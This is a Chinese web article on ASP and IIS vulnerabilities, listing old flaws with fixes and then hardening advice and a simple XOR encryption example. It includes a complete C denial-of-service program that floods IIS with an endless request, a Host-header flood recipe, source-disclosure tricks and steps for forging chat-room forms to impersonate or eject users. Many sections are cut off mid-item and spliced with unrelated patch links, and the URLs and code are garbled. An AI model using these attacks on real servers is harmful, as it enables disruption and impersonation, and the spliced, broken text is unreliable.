ASP教程,ASP应用-虚拟主机资讯
asp漏洞及安全建议
( 小 鸟 )
一 前言
microsoft active server pages(asp)是服务器端脚本编写环境,使用它可以创建和运行动态、交互的 web 服务器应用程序。使用 asp 可以组合 html 页 、脚本命令和 activex 组件以创建交互的 web 页和基于 web 的功能强大的应用程序。
现在很多网站特别是电子商务方面的网站,在前台上大都用asp来实现。以至于现在asp在网站应用上很普遍。
asp是开发网站应用的快速工具,但是有些网站管理员只看到asp的快速开发能力,却忽视了asp安全问题。asp从一开始就一直受到众多漏洞,后门的困扰,包括%81的噩梦,密码验证问题,iis漏洞等等都一直使asp网站开发人员心惊胆跳。
本文试图从开放了asp服务的操作系统漏洞和asp程序本身漏洞,阐述asp安全问题,并给出解决方法或者建议。
二 关键字
asp,网络安全,iis,ssl,加密。
三 asp工作机理
active server page技术为应用开发商提供了基于脚本的直观、快速、高效的应用开发手段,极大地提高了开发的效果。在讨论asp的安全性问题之前,让我们来看看asp是怎么工作的。asp脚本是采用明文(plain text)方式来编写的。
asp脚本是一系列按特定语法(目前支持vbscript和jscript两种脚本语言)编写的,与标准html页面混合在一起的脚本所构成的文本格式的文件。当客户端的最终用户用web浏览器通过internet来访问基于asp脚本的应用时,web浏览器将向web服务器发出http请求。web服务器分析、判断出该请求是asp脚本的应用后,自动通过isapi接口调用asp脚本的解释运行引擎(asp.dll)。asp.dll将从文件系统或内部缓冲区获取指定的asp脚本文件,接着就进行语法分析并解释执行。最终的处理结果将形成html格式的内容,通过web服务器“原路”返回给web浏览器,由web浏览器在客户端形成最终的结果呈现。这样就完成了一次完整的asp脚本调用。若干个有机的asp脚本调用就组成了一个完整的asp脚本应用。
让我们来看看运行asp所需的环境:
microsoft internet information server 3.0/4.0/5.0 on nt server
microsoft internet information server 3.0/4.0/5.0 on win2000
microsoft personal web server on windows 95/98
windows nt option pack所带的microsoft iis提供了强大的功能,但是iis在网络安全方面却是比较危险的。因为很少有人会用windows 95/98当服务器,因此本文我更多的从nt中的iis安全问题来探讨。
四 微软自称的asp的安全优点
虽然我们本文的重点是探讨asp漏洞和后门,但是有必要谈谈asp在网络安全方面的“优点”,之所以加个“”,是因为有时这些微软宣称的“优点”恰恰是其安全隐犯。
微软称asp在网络安全方面一大优点就是用户不能看到asp的源程序,
从asp的原理上看,asp在服务端执行并解释成标准的html语句,再传送给客户端浏览器。“屏蔽”源程序能很好的维护asp开发人员的版权,试想你辛辛苦苦做了一个很优秀的程序,给人任意copy,你会怎么想?而且黑客还能分析你的asp程序,挑出漏洞。更重要的是有些asp开发者喜欢把密码,有特权的用户名和路径直接写在程序中,这样别人通过猜密码,猜路径,很容易找到攻击系统的“入口”。但是目前已经发现了很多能查看asp源程序的漏洞,后面我们还要讨论。
iis支持虚拟目录,通过在“服务器属性”对话框中的“目录”标签可
以管理虚拟目录。建立虚拟目录对于管理web站点具有非常重要的意义。虚拟目录隐藏了有关站点目录结构的重要信息。因为在浏览器中,客户通过选择“查看源代码”,很容易就能获取页面的文件路径信息,如果在web页中使用物理路径,将暴露有关站点目录的重要信息,这容易导致系统受到攻击。其次,只要两台机器具有相同的虚拟目录,你就可以在不对页面代码做任何改动的情况下,将web页面从一台机器上移到另一台机器。还有就是,当你将web页面放置于虚拟目录下后,你可以对目录设置不同的属性,如:read、excute、script。读访问表示将目录内容从iis传递到浏览器。而执行访问则可以使在该目录内执行可执行的文件。当你需要使用asp时,就必须将你存放.asp文件的目录设置为“excute(执行)”。建议大家在设置web站点时,将html文件同asp文件分开放置在不同的目录下,然后将html子目录设置为“读”,将asp子目录设置为“执行”,这不仅方便了对web的管理,而且最重要的提高了asp程序的安全性,防止了程序内容被客户所访问。
五 asp漏洞分析和解决方法
有人说一台不和外面联系的电脑是最安全的电脑,一个关闭所有端口,不提供任何服务的电脑也是最安全的。黑客经常利用我们所开放的端口实施攻击,这些攻击最常见的是ddos(拒绝服务攻击).下面我会列出asp的二十几个漏洞,每个漏洞都会有漏洞描述和解决方法。
1 在asp程序后加个特殊符号,能看到asp源程序
受影响的版本:
win95+pws
iis3.0
98+pws4 不存在这个漏洞。
iis4.0以上的版本也不存在这个漏洞。
问题描述:
这些特殊符号包括小数点,%81, ::$data。比如:
http://http://www.zjjv.com///downloads/release.asp?releaseid=17727
alpha:
http://http://www.zjjv.com///downloads/release.asp?releaseid=17728
indexing services for windows 2000:
intel:
http://http://www.zjjv.com///downloads/release.asp?releaseid=17726
8、asp聊天室程序的漏洞
问题描述:
如果聊天室asp程序设计不当,很容易会给他人利用来做坏事:可以踢人,穿墙,捣乱.
首先,我们看看聊天室里有什么漏洞,大家看看下面这段代码:
<html>
<head>
<body bgcolor="008888" text="ffffff">
…………………………
………………
………
<form name="sendmsg" action="chatt.asp" method="post" target="mtalk1"
onsubmit="return chksend();">
<input type="hidden" name="username" value="测试者">******
<input type="hidden" name="sex" value="boy">********
<input type="hidden" name="message" value="">
<input type="hidden" name="a_method" value="sendtalk">
<div align="center"><center>
<table cellspacing="0" cellpadding="0"> <tr>
<td>发言: <input type="text" name="msg" size="60"> </td>
<td><input type="submit" value="发 言"> </td>
</tr>
<tr>
<td>悄悄:<input type=checkbox name=mtalk value=1>
对象:<input type="text" name="betalk" size="10">
表情:<select name="exp" onchange="document.sendmsg.msg.focus();documen
t.sendmsg.msg.select();" size="1">
………
……………
……………………
</form>
<form name="getout" action="chatt.pl" method="post">
<input type="hidden" name="username" value="测试者">!!!!!!
<input type="hidden" name="a_method" value="getout">!!!!
<input type="submit" value="退 出"></td>
</form>
</body>
</html>
以上这段代码是我在某个聊天室用"测试者"作代号登陆后在发言帧当下来的,这只是一小部份,但在这一小部份代码里面就有两个漏洞。
第一个漏洞
大家看看上面的代码加上"*"号的那两句,其中第一句中的"测试者"就是我登陆的名字,还有,第二句中的"boy"是登陆时的性别,还有再看看下面我加上"!" 号的两句,第一句里还是有我登陆时的名字,这几句都是我现在想说的两个漏洞所在点。如果想在这个聊天室里穿墙的话,只要把发言帧的代码当下来另存,把"form"的"action"改成聊天室的地址,然后把再"*"号的第一句的“测试者”两字改成想要的名字就可以了。也可以变换性别,只要把第二句的 "boy"改成"girl"。这就是所谓的穿墙术了。你甚至可以把它改成在线人的名字,然后发言,这样就冒充别人的姓名谈话。
第二个漏洞
踢人的漏洞就是这个了,我们看一下带"!"号的第一句,上面有是合法用户登陆的名字,再看第二句,他有”getout”,再加上上面还有一段"form"标签,这段就是我们退出聊天室时的代码,这个有什么用呢?我们先试试看,首先还是把"form"标签的"action"改成聊天室的地址,不然就不知道提交给哪个家伙了。然后把"风风"改成你想踢下去的人的名字然后单击“退出”,那就把那个人踢出聊天室了。这个就是聊天室踢人的漏洞。
这两个漏洞主要的原因是这两个漏洞使服务程序不识别客户发出的指令是不是合法用户。以上两漏骗服务程序来更名发出发言,或更名退出,使得真正的使用者受害。
当然上面的程序中还有一个漏洞,输入框没有对html语句和javascript语句做过滤。这个问题我们在漏洞5中已有详细分析,这里就不谈了。
问题解决或者建议:
在程序设计中让服务程序能识别到底是哪个家伙发出的指令就可以了,具体做法可以为每个聊天者发一个识别码,象五笔字一样,也可以用每个聊天者的密码识别,也可以把聊天者的密码随机加密后用作识别等等,反正能使你的服务程序识别到底是谁发出的指令就可以了。
9、nt iss4.0_authchangeurl? 漏洞
问题描述:
在nt iis4.0,当输入如下命令时
http://http://www.zjjv.com//ns.net/exploits/nt/dvwssr1.pl
11、漏洞名称:iis4.0受http的d.o.s攻击漏洞
问题描述:
受影响的版本:iis 4.0以及更早的版本
这是一个很简单的方法.发送很多的"host:aaaaa...aa"到iis:
get / http/1.1
host: aaaaaaaaaaaaaaaaaaaaaaa....(200 bytes)
host: aaaaaaaaaaaaaaaaaaaaaaa....(200 bytes)
...10,000 lines
host: aaaaaaaaaaaaaaaaaaaaaaa....(200 bytes)
发送了象上面所写的两次请求后,对方的iis在接受了这些请求后就会导致内存溢出.当然,它就不能对更多的请求作出反应。因为对方正缺乏虚拟内存,服务器也将停止运行。事后,对方不能通过重起web service来解决问题,而必须重启服务器。
12 漏洞名称:iis5.0超长url拒绝服务漏洞
问题描述:
microsoft iis 5.0在处理以".ida"为扩展名的url请求时,它会有两种结果。一个可能的结果是服务器回复"url string too long"的信息;或类似"cannot find the specified path" 的信息。另一种可能就是服务器端服务停止,并返回"access violation"信息(即成功的实现了对服务器端的拒绝服务攻击)
当远端攻击者发出类似如下的请求时:
http://http://www.zjjv.com///downloads/release.asp?releaseid=17727
alpha: http://http://www.zjjv.com///downloads/release.asp?releaseid=17728
windows 2000 indexing services:
intel: http://http://www.zjjv.com///downloads/release.asp?releaseid=17726
15 绕过验证直接进入asp页面。
漏洞描述:
如果用户知道了一个asp页面的路径和文件名,而这个文件又是要经过验证才能进去的,但是用户直接输入这个asp页面的文件名,就有可能通过绕过验证.比如:我在一些网站上这样试过:首先关闭所有的浏览器,窗口,输入:
http://http://www.zjjv.com///downloads/release.asp?releaseid=20906
internet information server 5.0:
http://http://www.zjjv.com///downloads/release.asp?releaseid=20904
更多的信息:
http://http://www.zjjv.com///technet/security/bulletin/ms00-030.asp
microsoft 安全公告ms00-021:
http://http://www.zjjv.com///technet/security/bulletin/fq00-030.asp
相关连接
http://http://www.zjjv.com//srback.com
17 iis web server dos
漏洞描述:
默认情况下,iis容易被拒绝服务攻击。如果注册表中有一个叫 "maxclientrequestbuffer" 的键未被创建,针对这种nt系统的攻击通常能奏效。 "maxclientrequestbuffer" 这个键用于设置iis允许接受的输入量。如果 "maxclientrequestbuffer" 设置为256(bytes),则攻击者通过输入大量的字符请求iis将被限制在256字节以内。而系统的缺省设置对此不加限制,因此,利用下面的程序。可以很容易地对iis server实行dos攻击:
#include <stdio.h>
#include <windows.h>
#define max_thread 666
void cng();
char *server;
char *buffer;
int port;
int counter = 0;
int current_threads = 0;
int main(int argc, char **argv)
{
word tequila;
wsadata data;
int p;
dword tid;
handle hthread[2000];
//this code is as is and sucks as it is. wont exit correctly and a lot
of other fun things.
//that i didnt want to take the time to do. so just ctrl+c out of the
code.
//load up cnghack.exe 3 times for charm.
printf("cng iis dos.\nmarc@eeye.com\nhttp://http://www.zjjv.com//\n\"for my
beloved.\"\n");
if(argc<2){
printf("usage: %s [server] [port]\n",argv[0]);
exit(1);
}
buffer=malloc(17500);
memset( buffer, a, strlen(buffer));
server=argv[1];
port=atoi(argv[2]);
tequila = makeword( 1, 1 );
printf("attempting to start winsock... ");
if( (wsastartup(tequila, &data)) !=0 ){
printf("failed to start winsock.\n");
exit(1);
}
else{
printf("started winsock.\n\n");
}
counter = 0;
for(p = 0 ; p < max_thread ; ++p ){
hthread[counter] = createthread(0,
0,
(lpthread_start_routine) cng,
( void * )++counter,
0,
&tid);
}
sleep(250);
while( current_threads )
sleep(250);
counter = 0;
printf("terminated threads.\n");
while (counter < max_thread)
{
terminatethread( hthread[counter], 0 );
++counter;
}
wsacleanup();
return 0;
}
void cng()
{
int sockfd=0, p;
struct sockaddr_in dstsain;
char getkilled[]="get / http/\r\n";
int die=1;
printf("entered cng\n");
++current_threads;
dstsain.sin_family = af_inet;
dstsain.sin_port = htons((u_short)port);
dstsain.sin_addr.s_addr=inet_addr( server );
if((sockfd = socket(af_inet, sock_stream, 0)) < 0){
printf("failed to create socket\n");
--current_threads;
return;
}
if(!connect(sockfd,(struct sockaddr *)&dstsain, sizeof(dstsain)))
{
p=send(sockfd,getkilled,strlen(getkilled),0);
printf("step 1: %i\n", p);
for(;;){
p=send(sockfd,buffer,strlen(buffer),0);
printf("p: %i\n", p);
//put in some code to check if send = -1 more then x times we drop
the loop and exit the thread
//bla bla bla i love the dirtiness of concept code.
}
}
--current_threads;
printf("exited cng\n");
return;
}
cnghack.c works by doing the following:
connects to example.com
sends: get / http/[return][buffer]
where:
[return] is just an \r\n
[buffer] is a never ending stream of as
攻击结果将导致nt系统的cpu占用率达到 100%
解决方案
运行regedt32.exe
在:
hkey_local_machine\system\currentcontrolset\services\w3svc\parameters
增加一个值:
value name: maxclientrequestbuffer
data type: reg_dword
设置为十进制
具体数值设置为你想设定的iis允许接受的url最大长度。
cnns的设置为256
18、ms odbc数据库连接溢出导致nt/9x拒绝服务攻击
漏 洞 描 述:
microsoft odbc数据库在连接和断开时可能存在潜在的溢出问题(microsoft access数据库相关)。
如果不取消连接而直接和第二个数据库相连接,可能导致服务停止。
影响系统:
odbc 版本: 3.510.3711.0
odbc access驱动版本: 3.51.1029.00
os 版本: windows nt 4.0 service pack 5, iis 4.0 (i386)
microsoft office 97 professional (mso97.dll: 8.0.0.3507)
漏洞检测方法如下:
odbc 连接源名称: miscdb
odbc 数据库型号: ms access
odbc 假设路径: d:\data\misc.mdb
asp代码如下:
<%
set connvb = server.createobject("adodb.connection")
connvb.open "driver={microsoft access driver (*.mdb)}; dsn=miscdb"
%>
<html>
<body>
...lots of html removed...
"重命名"),比如更改成为 hkey_classes_root\scripting.filesystemobject2 这样,在asp就必须这样引用这个对象了: set fso = createobject("scripting.filesystemobject2") 而不能使用: set fso = createobject("scripting.filesystemobject") 如果你使用通常的方法来调用filesystemobject对象就会无法使用了。 只要你不告诉别人这个更改过的对象名称,其他人是无法使用filesystemobject对象的。这样,作为站点管理者我们就杜绝了他人非法使用filesystemobject对象,而我们自己仍然可以使用这个对象来方便的实现网站在线管理等等功能了!
21 iis4.0/iis5.0超长文件名请求存在漏洞
漏洞描述:
受影响的版本:
microsoft iis 5.0
+ microsoft windows nt 2000
microsoft iis 4.0
+ microsoft windows nt 4.0
+ microsoft backoffice 4.5
- microsoft windows nt 4.0
+ microsoft backoffice 4.0
microsoft windows nt 4.0
当在一个已知的文件名后加230个"%20"再加个.htr,会使安装有microsoft iis 4.0/5.0泄漏该文件的内容。这是由ism.dll映射的.htr文件引起的.比如:
http://http://www.zjjv.com///download/win2000platform/patch/q249599/nt5/en-us/q249599_w2k_sp1_x86_en.exe
microsoft iis 4.0:
http://http://www.zjjv.com///download/iis40/patch/q260838/nt4alpha/en-us/ismpst4i.exe
22 asp编辑器会自动备份asp文件,会被下载的漏洞
漏洞描述:
在有些编辑asp程序的工具,当创建或者修改一个asp文件时,编辑器自动创建一个备份文件,比如:ultraedit就会备份一个..bak文件,如你创建或者修改了some.asp,编辑器自动生成一个叫some.asp.bak文件,如果你没有删除这个bak文件,攻击有可以直接下载some.asp.bak文件,这样some.asp的源程序就会给下载。
六 asp安全建议
如何设置才能使asp更加安全呢?以下我们重点来谈谈asp安全方面要注意的问题。我们在第五部分“asp漏洞和解决方法”中针对某些漏洞,也提出了相应的安全建议,这部分就不再重复。
在这部分的后面还要介绍些可扫描asp漏洞的工具。
1 安装nt最新的补丁
目前最新的补丁是nt option pack 6.0.,微软的主页有最新的补丁。一般来说微软都会及时的公布最新的漏洞和补丁。目前iis最新是5.0。windows2000自带iis5.0.
iis 5.0新功能如下:
安全性上:包括摘要式验证、整合的windows验证、sgc (server-gated cryptography ) 、microsoft certificate services 2.0、集区处理程序之程序保护等。
管理上:包括iis重新激活、站台cpu使用时间的限制、cpu资源使用记录、使用终端机服务远程管理iis、自订错误讯息等。
internet标准上:包括webdav(web distributed authoring and versioning)、ftp重新激活、http压缩等。
active server pages:包括新的转向方法(server.transfer与server.execute方法)、新的错误处理功能(server.getlasterror方法)、无指令.asp的执行速度增快、可安装组件的效能调升、scriptlet支持、使用cookie取得浏览器信息、自动增减执行绪(executing threads)、src服务器端包含功能、script encoder编码保护等。
更具体的功能介绍请参见其它资料。
2 关闭没有用的服务和协议
“尽量少开没用到的服务”,这永远是网络安全的准则。如果开启了某个
服务,你就要面对不少的漏洞困扰,更重要的是你还要时时提防未来的由这个服务所引起的漏洞。
比如,你不使用ftp,那就把ftp关了,不然你就要发费大量的精力
和金钱去应付那些什么dos,缓冲区溢出之类的漏洞。netbios也是windows的一大安全隐患,我想目前服务器很少需要netbios。再如你的iis安装了index server 服务,那你至少要面对三个以上的有关这个服务的漏洞,因此如果你没用到index server服务,也大可删除他.
同样的道理,我们要安装最少的协议。千万不要安装点对点通道
通讯协议。此外,还必须小心地配置tcp/ip协议。在tcp/ip的属性页中选择“ip地址”项目,然后选择“高级”。在弹出来的对话框中选择“安全机制”,这样你可以禁止udp,然后开启ip端口6和tcp端口80。当然开不开这些端口主要是看你的情况了。
iis中的应用程序映射也是个很大的安全漏洞,请在iis中设置好扩展名和可执行路径,删除没用的扩展名。
3 设置好你的nt
nt缺省安装时,系统账号administrator和guest被自动设置,很多攻击者就是利用这些账号来猜密码,从而进入你的系统。虽然没有足够的耐心,很难猜中这些密码,但是为了安全起见,建议把这些账号重新命名或者删除。
nt server的系统策略编辑器非常有用。按“管理工具”->“系统策略编辑器”就可以进入,然后选择“文件”->“打开注册表”,并选择“本地计算机”图标,就可以认真配置了。主要设置以下几项:
取消:网络->系统规则更新->远程更新
取消:windows nt网络->共享->创建隐藏的驱动器共享
设置:windows nt远程访问下面的各项
设置:windows nt系统->登录中各个项目。包括设置登录标记;不允许从“身份验证对话框”关机;不显示上次登录的用户名.
设置:windows nt系统->文件系统中的“不为长文件名创建8.3文件名”
不要使用远程管理软件,除非不得已。由于nt不太支持远程管理,所以你可能会安装reachout或者pc anywhere来管理。可是,当你安装了这些软件,你就不得不开启tcp/ip的所有端口。
在你离开服务器的时候,请按”ctrl+del+alt”,并选择“锁定工作站”。
4 磁盘文件格式使用比较安全的ntfs格式。
ntfs 权限是 web 服务器安全性的基础,它定义了一个或一组用户访问文件和目录的不同级别。当拥有 windows nt 有效帐号的用户试图访问一个有权限限制的文件时,计算机将检查文件的访问控制表 (acl)。该表定义了不同用户和用户组所被赋予的权限。例如,web 服务器上的 web 应用程序的所有者需要有“更改”权限来查看、更改和删除应用程序的 .asp 文件。但是,访问该应用程序的公共用户应仅被授予“只读”权限,以便将其限制为只能查看而不能更改应用程序的 web 页。
5 对目录设置不同的属性,如:read、excute、script。
您可以通过配置您的 web 服务器的权限来限制所有用户查看、运行和操作您的asp 页的方式。不同于 ntfs 权限提供的控制特定用户对应用程序文件和目录的访问方式, web 服务器权限应用于所有用户,并且不区分用户帐号的类型。 对于要运行您的 asp 应用程序的用户,在设置 web 服务器权限时,必须遵循下列原则:
对包含 .asp 文件的虚拟目录允许“读”或“脚本”权限。
对 .asp 文件和其他包含脚本的文件(如 .htm 文件等)所在的虚目录允许“读”和“脚本”权限。
对包含 .asp 文件和其他需要“执行”权限才能运行的文件(如 .exe 和 .dll 文件等)的虚目录允许“读”和“执行”权限。
6 维护 global.asa 的安全
为了充分保护 asp 应用程序,一定要在应用程序的 global.asa 文件上为适当的用户或用户组设置 ntfs 文件权限。如果 global.asa 包含向浏览器返回信息的命令而您没有保护 global.asa 文件,则信息将被返回给浏览器,即便应用程序的其他文件被保护。
7不要把密码,物理路径直接写在程序中。
很难保证您的asp程序是否会给人拿到,即使你安装了最新的补丁。为
了安全起见,应该把密码和用户名保存在数据库中,使用虚拟路径。
8 在程序中记录用户的详细信息.
这些信息包括用户的浏览器、用户停留的时间,用户ip等。其中
记录ip是最有用的。
可用下面的语句了解客户端和服务端的信息:
<table><%for each name in request.servervariables%>
<tr><td><%=name%>:</td>
<td><%=request.servervariables(name)%></td>
</tr>
<%next%></table>
如果我们可以记录了用户的ip,就能通过追捕来查用户的具体地点。
当然如果用户通过代理来浏览网页,上面的方法只能看到用户代理的ip,而不能记录用户真实的ip。asp没有提供查看客户端网卡物理地址(即mac)的功能。
9 cookie 安全性
asp 使用 sessionid cookie 跟踪应用程序访问或会话期间特定的 web 浏览器的信息。这就是说,带有相应的 cookie 的 http 请求被认为是来自同一 web 浏览器。web 服务器可以使用 sessionid cookies 配置带有用户特定会话信息的 asp 应用程序。例如,如果您的应用程序是一个允许用户选择和购买 cd 唱盘的联机音乐商店,就可以用 sessionid 跟踪用户漫游整个应用程序时的选择。
sessionid 能否被黑客猜中?
为了防止计算机黑客猜中 sessionid cookie 并获得对合法用户的会话变量的访问,web 服务器为每个 sessionid 指派一个随机生成号码。每当用户的 web 浏览器返回一个 sessionid cookie 时,服务器取出 sessionid 和被赋予的数字,接着检查是否与存储在服务器上的生成号码一致。若两个号码一致,将允许用户访问会话变量。这一技术的有效性在于被赋予的数字的长度(64 位),此长度使计算机黑客猜中 sessionid 从而窃取用户的活动会话的可能性几乎为 0。
加密重要的 sessionid cookie.
截获了用户 sessionid cookie 的计算机黑客可以使用此 cookie 假冒该用户。如果 asp 应用程序包含私人信息,信用卡或银行帐户号码,拥有窃取的 cookie 的计算机黑客就可以在应用程序中开始一个活动会话并获取这些信息。您可以通过对您的 web 服务器和用户的浏览器间的通讯链路加密来防止 sessionid cook ie 被截获。
10使用身份验证机制保护被限制的 asp 内容
可以要求每个试图访问被限制的 asp 内容的用户必须要有有效的 windows nt帐号的用户名和密码。每当用户试图访问被限制的内容时,web 服务器将进行身份验证,即确认用户身份,以检查用户是否拥有有效的 windows nt 帐号。
web 服务器支持以下几种身份验证方式:
基本身份验证 提示用户输入用户名和密码。
windows nt 请求/响应式身份验证,从用户的 web 浏览器通过加密方式获取用户身份信息。
然而,web 服务器仅当禁止匿名访问或 windows nt 文件系统的权限限制匿名访问时才验证用户身份。
11 保护元数据库
访问元数据库的 asp 脚本需要 web 服务器所运行的计算机的管理员权限。在从远程计算机上运行这些脚本时,须经已通过身份验证的连接,如使用 windows nt 请求/响应验证方式进行连接。应该为管理级 .asp 文件创建一个服务器或目录并将其目录安全验证方式设置为 windows nt 请求/响应式身份验证。目前,仅 microsoft internet explorer version 2.0 或更高版本支持 windows nt 请求响应式身份验证。
12 使用 ssl 维护应用程序的安全
ssl (secure sockets layer)协议是由netscape首先发表的网络资料安全传输协定,其首要目的是在两个通信间提供秘密而可靠的连接。该协议由两层组成,底层是建立在可靠的传输协议(例如:tcp)上的是ssl的记录层,用来封装高层的协议。ssl握手协议准许服务器端与客户端在开始传输数据前,能够通过特定的加密算法相互鉴别。ssl的先进之处在于它是一个独立的应用协议,其它更高层协议能够建立在ssl协议上。
ssl3.0 协议作为 web 服务器安全特性,提供了一种安全的虚拟透明方式来建立与用户的加密通讯连接。ssl 保证了 web 内容的验证,并能可靠地确认访问被限制的 web 站点的用户的身份。
通过 ssl,您可以要求试图访问被限制的 asp 应用程序的用户与您的服务器建立一个加密连接;以防用户与应用程序间交换的重要信息被截取。
比如好多基于web的asp论坛都会提供注册用户互相发送信息的服务,这种信息是明文传送的,如果在网吧就很容易给人监听到。如果加了一层ssl认证,就会防止发送信息被监听的可能。
13 客户资格认证
控制对您的 asp 应用程序访问的一种十分安全的方法是要求用户使用客户资格登录。客户资格是包含用户身份信息的数字身份证,它的作用与传统的诸如护照或驾驶执照等身份证明相同。用户通常从委托的第三方组织获得客户资格,第三方组织在发放资格证之前确认用户的身份信息。(通常,这类组织要求姓名、地址、电话号码及所在组织名称;此类信息的详细程度随给予的身份等级而异。)
每当用户试图登录到需要资格验证的应用程序时,用户的 web 浏览器会自动向服务器发送用户资格。如果 web 服务器的 secure sockets layer (ssl) 资格映射特性配置正确,那么服务器就可以在许可用户对 asp 应用程序访问之前对其身份进行确认。
作为 asp 应用程序开发人员,您可以编写脚本来检查资格是否存在并读取资格字段。例如,您可以从资格证明中访问用户名字段和公司名字段。active server pages 在 request 对象的 clientcertificate 集合中保存资格信息。
必须将 web 服务器配置为接受或需要客户资格,然后才能通过 asp 处理客户资格;否则,clientcertificate 集合将为空。
14 asp的加密
由于asp脚本是采用明文(plain text)方式来编写的,所以应用开发商辛苦开发出来的asp应用程序,一旦发布到运行环境中去后,就很难确保这些“源代码”不会被流传出去。这样就产生了如何有效地保护开发出来的asp脚本源代码的需求。
官方加密程序:从微软免费下载到sce10chs.exe 直接运行即可完成安装过程。安装完毕后,将生成screnc.exe文件,这是一个运行在dos promapt的命令工具。
运行screnc - l vbscript source.asp destination.asp生成包含密文asp脚本的新文件destination.asp用记事本打开看凡是“<%和%>"之内的,不管是否注解,都变成不可阅读的密文了,但无法加密中文。
几种asp源代码保护方法:
1,“脚本最小化”即asp文件中只编写尽可能少的源代码,实现
商业逻辑的脚本部分被封装到一个com/dcom组件,并在asp脚
本中创建该组件,进而调用相应的方法(methed)即可。应用开发者
动手开发asp脚本应用之前就可按此思路来开发,或者直接用asp
脚本快速开发出原型系统后,针对需要保护、加密的重要脚本用
com/dcom组件来重新开发、实现并替换。
2,“脚本加密”即asp脚本仍直接按源代码方式进行开发,但在发布到运行环境之前将脚本进行加密处理,只要把加密后的密文脚本发布出去。即在asp.dll读取脚本这个环节加入密文还原的处理。实现这种思路的方法有两种:一是自行开发一个isapi的iis过滤(filter)块,在asp.dll之前勾连(hook)对asp脚本文件的读取,以便把文件系统读出的密文还原成asp.dll可以解释的明文;
方法二是直接由asp.dll提供对asp脚本加密处理的支持。微软在新版本的vbscript.dll jscript.dll中提供这种成为ms script encode技术的支持。这样,无论是客户端的vbscript jscript(包括wsh脚本等),还是服务器端的vbscript jscript (即asp脚本)都可以支持加密处理。
ms script encode 技术具体的实现思路包括以下两个方面:一是
加密过程,通过提供一个实用程序对包含asp脚本源代码的文本文件
进行扫描,找出其标记为<script language = "vbscript.encode">或<script
language = "jscript.encode">;二是还原过程,ie或asp.dll等执行
脚本时是统一通过vbscript.dll jscript.dll来解释执行的,所以它们都
能同时地、透明地支持明文和密文的脚本。
总之,如果采用第一种思路,要么就自行在开发过程中遵照进行,
要么可以考虑选择自动转换成visual basic 编译代码的通用的、实用工具;采取第二种思路的化,要么就自行开发iis isapi过滤模块,要么可以考虑直接采用ms script encode软件。
下面来看看一种asp可以使用的简单字符加密算法,而不是那些受限制的加密算法。其实,这里介绍的加密算法对于一般的运用来说已经足够解密人麻烦一阵子的了。它的加密基础是最简单的vernum密码方法, 它的基本原理是,需要有一个需要加密的明文和一个随机生成的解密钥匙文件。然后使用这两个文件组合起来生成密文。 (明文) 组合 (密钥) = 加密后的密文 所以这里介绍的是生成密钥的代码。我们假设我们生成的密钥为512位长的密钥,它已经足够来加密一个文本字符了。代码如下:
keygen.asp文件<% ****************************** keygen.asp******************************const g_keylocation = "c:\key.txt"const g_keylen = 512on error resume nextcall writekeytofile(keygen(g_keylen),g_keylocation)if err <> 0 then response.write "error generating key." & "<p>" response.write err.number & "<br>" response.write err.description & "<br>" else response.write "key successfully generated."end ifsub writekeytofile(mykeystring,strfilename) dim keyfile, fso set fso = server.createobject("scripting.filesystemobject") set keyfile = fso.createtextfile(strfilename, true) keyfile.writeline(mykeystring) keyfile.closeend subfunction keygen(ikeylength)dim k, icount, strmykey lowerbound = 35 upperbound = 96 randomize initialize random-number generator. for i = 1 to ikeylength s = 255 k = int(((upperbound - lowerbound) + 1) * rnd + lowerbound) strmykey = strmykey & chr(k) & "" next keygen = strmykeyend function%>
在iis下运行上面的keygen.asp页面。你只需要如此做一次,他将把密钥写入文件c:\key.txt中 (如果你愿意的话,你也可以把这个文件放到另外一个更加安全的地方).然后你可以打开这个key.txt文件,它将包含512个ascii码在35到96之间的字符.并且由于是随机生成的,所以每个人的私人密钥文件key.txt将是不一样的,下面是一个例子密钥文件:
iy/;$>=3)?^-+7m32#q]voii.q=ofmc`:p7_b;<r/8u)xfhc<sr_e$.dlg=i+@5%*+op:f_=;nsy`-^s.`aa=bj3m0.wf#t5lgk(=/<:+c2k/^7ai$;puome2+t8nd?w$c(j\,;631m-ld5f%%1tf_&k2a-d-54[2p,#*ju%6`0rf3cmf0(#t07ufz=>#,+.aw_/+)dib;2dtia57tt&-]o/*fm>h.xh5w^0y*=71+5*^`^pkj(=e/x#7a:?,s>r&t;+b#<:-*\@)x9f`_`%qa3z95.?_t#1,$2#fww5pbh^*<))a(s0@avd8c^q0r^t1d?(1+,ye71x+.*+u$:3xo^q).kg&0n0);[lj<oz6in?7n4<gtl?(m4s8+3jmk5)hc%^1^+k;\$wbxpa?f&5^e\d$7%*o/u[1/?8(5:1ovwv*1z-%`:k&v?x1,1kurd@3w0^d)<og40?(vj4ewl5a5m<$a);cq36r9i]*u#q%1<y\&sa%#1<v
下面再仔细分析一下上面的程序,我们发现其中的lowerbound和upperbound的数值其实就是你想使用来加密的ascii字符范围。
下面的代码将介绍如何使用这个密钥来加密和解密一个字符串
crypt.asp文件
<%
dim g_key
const g_cryptthis = "now is the time for all good men to come to the aid of their country."
const g_keylocation = "c:\key.txt"
g_key = mid(readkeyfromfile(g_keylocation),1,len(g_cryptthis))
response.write "<p>original string: " & g_cryptthis & "<p>"
response.write "<p>key value: " & g_key & "<p>"
response.write "<p>encrypted cyphertext: " & encrypt(g_cryptthis) & "<p>"
response.write "<p>decrypted cyphertext: " & decrypt(encrypt(g_cryptthis)) & "<p>"
function encrypt(strcryptthis)
dim strchar, ikeychar, istringchar, i
for i = 1 to len(strcryptthis)
ikeychar = asc(mid(g_key,i,1))
istringchar = asc(mid(strcryptthis,i,1))
*** uncomment below to encrypt with addition,
icryptchar = istringchar + ikeychar
icryptchar = ikeychar xor istringchar
strencrypted = strencrypted & chr(icryptchar)
next
encrypt = strencrypted
end function
function decrypt(strencrypted)
dim strchar, ikeychar, istringchar, i
for i = 1 to len(strencrypted)
ikeychar = (asc(mid(g_key,i,1)))
istringchar = asc(mid(strencrypted,i,1))
*** uncomment below to decrypt with subtraction
idecryptchar = istringchar - ikeychar
idecryptchar = ikeychar xor istringchar
strdecrypted = strdecrypted & chr(idecryptchar)
next
decrypt = strdecrypted
end function
function readkeyfromfile(strfilename)
dim keyfile, fso, f
set fso = server.createobject("scripting.filesystemobject")
set f = fso.getfile(strfilename)
set ts = f.openastextstream(1, -2)
do while not ts.atendofstream
keyfile = keyfile & ts.readline
loop
readkeyfromfile = keyfile
end function
%>
在crypt.asp中我们首先从密钥文件中得到密钥值,然后从这段密钥中
